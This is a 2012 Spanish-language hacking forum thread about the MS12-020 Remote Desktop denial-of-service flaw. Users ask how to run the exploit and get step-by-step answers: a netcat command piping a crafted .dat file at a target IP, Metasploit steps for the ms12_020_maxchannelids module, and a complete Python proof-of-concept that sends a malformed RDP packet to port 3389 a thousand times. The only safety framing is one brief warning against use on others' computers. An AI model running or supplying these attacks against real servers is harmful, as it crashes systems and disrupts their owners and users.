Indetectables

Indetectables es una Comunidad de Hacking, Seguridad Informática, Impresión 3d y Desarrollo
./index.php

RDP DoS MS12-20 ( con cuidado )

https://www.indetectables.net/viewtopic.php?t=38023

Página 1 de 1

RDP DoS MS12-20 ( con cuidado )

Publicado: 17 Mar 2012, 01:14
por osnaraus
Acà otro texto sobre la vulnerabilidad de Escritorio Remoto:

[Enlace externo eliminado para invitados]

Utiliza NetCat para llevar a cabo el ataque... pero tengan cuidado, miren lo que le pasó a un amigo:

[Enlace externo eliminado para invitados]

[Enlace externo eliminado para invitados]

No lo usen contra computadores ajenos, pueden causarle un gran daño

Re: RDP DoS MS12-20 ( con cuidado )

Publicado: 17 Mar 2012, 04:01
por NyxKazuya
Balla soy nuevo podrias decirme brevemente como uso el Xploit!

Re: RDP DoS MS12-20 ( con cuidado )

Publicado: 17 Mar 2012, 11:50
por osnaraus
NyxKazuya escribió:Balla soy nuevo podrias decirme brevemente como uso el Xploit!
En el caso de esta implementacion, necesitas el netcat, que lo puedes descargar de:
[Enlace externo eliminado para invitados]

Luego simplemente abres una consola donde tienes el netcat y el .dat y escribes

Código: Seleccionar todo

nc IPaAtacar < termdd_1.dat
Mas sencillo, echale agua

PD1: Tu no eres nuevo
PD2: Si lo quieres en formato .exe, he dejado el source en C en la Seccion C/C++
PD3: Si quieres lo compilo tambien por ti

Re: RDP DoS MS12-20 ( con cuidado )

Publicado: 18 Mar 2012, 22:22
por KHC
Muy interesante osni, gracias por el dato habia escuchado ya de esto pero no le preste atencion !

Re: RDP DoS MS12-20 ( con cuidado )

Publicado: 25 Mar 2012, 14:02
por Flight embedded
Gracias osnaraus. no habia visto esto.

Re: RDP DoS MS12-20 ( con cuidado )

Publicado: 26 Mar 2012, 04:15
por hardway
DoS attack bueno aporte

gracias por compartir

Re: RDP DoS MS12-20 ( con cuidado )

Publicado: 26 Mar 2012, 05:57
por NyxKazuya
Tengo una gran problema.

Ya lo puse en la direccion el exploit con extencion .rb, pero al momento de buscarlo con search mts no sale tampoco cuando lo uso

Re: RDP DoS MS12-20 ( con cuidado )

Publicado: 26 Mar 2012, 21:37
por osnaraus
Llamas mts a metasploit ?
Yo nunca dije que usaran metaspolit !!
Pero bueno, si quieres usarlo tienes la siguiente alternativa:
el modulo es RDP (Remote Desktop Packet)
asi que usas: search RDP
y en auxiliary vas a encontrar "ms12_020_maxchannelids"
Luego show options
y luego seteas el RHOST
Por ultimo: exploit
Bytes

Re: RDP DoS MS12-20 ( con cuidado )

Publicado: 30 Mar 2012, 19:23
por Flight embedded
Che Osnaraus, me tira error. Dice inválido puerto.
¿ Hay que abrir alguno en especial o qué estoy haciendo mal?

Re: RDP DoS MS12-20 ( con cuidado )

Publicado: 07 Jun 2012, 01:38
por zito
Me gustaria añadir un pequeño exploit compilado en python que he encontrado por la web,que hace la misma tarea...

Código: Seleccionar todo

# MS12-020 / CVE-2012-0002 Vulnerability - Proof of Concept
# BlackBap.Org

import socket
import sys


buf=""
buf+="\x03\x00\x00\x13" # TPKT, Version 3, lenght 19
buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224
buf+="\x03\x00\x01\xd6" # TPKT, Version 3, lenght 470
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x7f\x65\x82\x01\x94\x04" #MULTIPOINT-COMMUNICATION-SERVICE T.125

buf+="\x01\x01\x04\x01\x01\x01\x01\xff" # "Fuck you Chelios" packet
buf+="\x30\x19\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x02\x02\x04"
buf+="\x00\x00\x00\x00\x02\x04\x00\x00"
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\xff\xff\x02\x04\x00\x00\x00\x02"
buf+="\x30\x19\x02\x04\x00\x00\x00\x01"
buf+="\x02\x04\x00\x00\x00\x01\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\x04\x20\x02\x04\x00\x00\x00\x02"
buf+="\x30\x1c\x02\x02\xff\xff\x02\x02"
buf+="\xfc\x17\x02\x02\xff\xff\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x00\x02\x04\x00\x00\x00\x01"
buf+="\x02\x02\xff\xff\x02\x04\x00\x00"
buf+="\x00\x02\x04\x82\x01\x33\x00\x05"
buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"
buf+="\x08\x00\x10\x00\x01\xc0\x00\x44"
buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8"
buf+="\x00\x04\x00\x08\x00\x80\x02\xe0"
buf+="\x01\x01\xca\x03\xaa\x09\x04\x00"
buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"
buf+="\x00\x53\x00\x54\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\x00\x00"
buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x01\xca\x01\x00\x00\x00\x00"
buf+="\x00\x10\x00\x07\x00\x01\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c"
buf+="\x00\x0d\x00\x00\x00\x00\x00\x00"
buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00"
buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"
buf+="\x00\x03\x00\x00\x00\x72\x64\x70"
buf+="\x64\x72\x00\x00\x00\x00\x00\x80"
buf+="\x80\x63\x6c\x69\x70\x72\x64\x72"
buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70"
buf+="\x73\x6e\x64\x00\x00\x00\x00\x00"
buf+="\xc0"

buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80"  # ITU-T Rec X.224
buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125
buf+="\x03\x00\x00\x08" #TPKT, Version 3, Length 8
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" #ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" #ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xec"# MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c"  # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" #ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xed"# MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" #ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xee"# MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0b" # TPKT, Version 3, Lenght 12
buf+="\x06\xd0\x00\x00\x12\x34\x00"  #ITU-T Rec X.224

HOST = sys.argv[1]
PORT = 3389
for i in range(1000):
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((HOST,PORT))
 print "sending: %d bytes" % len(buf)
 s.send(buf)
 rec = s.recv(100)
 print "received: %d bytes" % len(rec)
 s.close()
# BlackBap.Org
Todos los horarios son UTC+02:00
Página 1 de 1

© Indetectables Team

Desarrollado por Indetectables LAB